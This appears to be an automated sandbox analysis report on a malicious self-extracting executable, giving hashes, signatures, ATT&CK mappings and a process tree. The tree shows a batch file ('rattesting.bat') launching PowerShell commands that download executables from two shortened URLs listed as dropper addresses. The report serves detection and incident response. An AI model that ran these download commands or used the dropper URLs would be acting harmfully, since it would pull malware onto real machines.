d4bc343f7ecdf7008db9c9c71b1d8e275051f24c3dc64b1353a32fcd0e92782f

General

Target

d4bc343f7ecdf7008db9c9c71b1d8e275051f24c3dc64b1353a32fcd0e92782f.exe
Size

309KB
MD5

6940553fce65b288660a664eb039ffe2
SHA1

8687dc9a6dc0f4b65035bcc76a5e6785eedf66e1
SHA256

d4bc343f7ecdf7008db9c9c71b1d8e275051f24c3dc64b1353a32fcd0e92782f
SHA512

044430fecd45f6119bf06c1ad4a3e7cd02464f579bd901ee883f12c05429812d0181b2fdf918db8a2f0070f7ccec184de0b11ba139a138a48bc45f3508041dc4
SSDEEP

6144:z8JsLcpjzTDDmHayakLkrb4NSarQW82X+t40X9U:IzxzTDWikLSb4NS7t2X+t40X9U

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://tinyurl.com/m58snm44

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://tinyurl.com/yc3v5z49

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
3	1932	powershell.exe
5	1932	powershell.exe
7	1932	powershell.exe
9	1932	powershell.exe
10	1932	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2220	powershell.exe
1932	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2220	powershell.exe
1932	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2220	powershell.exe
Token: SeDebugPrivilege	1932	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2820 wrote to memory of 2880	2820	d4bc343f7ecdf7008db9c9c71b1d8e275051f24c3dc64b1353a32fcd0e92782f.exe	30
PID 2820 wrote to memory of 2880	2820	d4bc343f7ecdf7008db9c9c71b1d8e275051f24c3dc64b1353a32fcd0e92782f.exe	30
PID 2820 wrote to memory of 2880	2820	d4bc343f7ecdf7008db9c9c71b1d8e275051f24c3dc64b1353a32fcd0e92782f.exe	30
PID 2820 wrote to memory of 2880	2820	d4bc343f7ecdf7008db9c9c71b1d8e275051f24c3dc64b1353a32fcd0e92782f.exe	30
PID 2880 wrote to memory of 2220	2880	cmd.exe	32
PID 2880 wrote to memory of 2220	2880	cmd.exe	32
PID 2880 wrote to memory of 2220	2880	cmd.exe	32
PID 2880 wrote to memory of 2220	2880	cmd.exe	32
PID 2880 wrote to memory of 1932	2880	cmd.exe	33
PID 2880 wrote to memory of 1932	2880	cmd.exe	33
PID 2880 wrote to memory of 1932	2880	cmd.exe	33
PID 2880 wrote to memory of 1932	2880	cmd.exe	33

C:\Users\Admin\AppData\Local\Temp\d4bc343f7ecdf7008db9c9c71b1d8e275051f24c3dc64b1353a32fcd0e92782f.exe
"C:\Users\Admin\AppData\Local\Temp\d4bc343f7ecdf7008db9c9c71b1d8e275051f24c3dc64b1353a32fcd0e92782f.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2820
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\rattesting.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2880
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://tinyurl.com/m58snm44', 'file.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2220
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://tinyurl.com/yc3v5z49', 'le.exe')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1932

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
2c8a95f82b5a43e40e9ea150507176ad

SHA1
fbca87a2cdcfa075c300ff976f83d05093d340b6

SHA256
2f41457fb29d623a9772c1440edd16de81f5ec9e83dd9a8dd11cc79806f66c90

SHA512
3339214e4cbd9cba1d93bf7ddd0e0bcd7514316ccb33698f0ae54d50a61db7f7dae8ba3e176d1e8baad3b3d4a468807e022c5907531bd7113c2010c35514489a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab6EEB.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\rattesting.bat

Filesize
287B

MD5
e072208f0724637156d508b89db54154

SHA1
ba65e528c56726d34e123bced6d6a3cd26e2cf0a

SHA256
29d168033c119e30aa7939abb96631d2714fb1051d4a25369074047abcca6fda

SHA512
0fabd9faeab61048e7adbcfb9c76b841640a17f26fed512bea0f29222a8a5fe8667eb023c171c3b14735fda000c021e4cdd157f7fcd0cddef917d77adae9be17

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar6F9A.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
acadd8e0168a0685531e2c61f10e5d5f

SHA1
2aa4ac41bb967d1a085c708e1c3c0ab6c06f5ffa

SHA256
bd6a5edc72067b6b11137a78c732e17f2db426ad1349f15db9f411a0dc770b77

SHA512
50b46b0509c87a062eb1d17367068bb8f0d9a5ee6ed87c6081b94bfe01875ce6d795404053fb7bb0e65edcca69b18c4353b38420782a8579d226c391f0b9954b

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads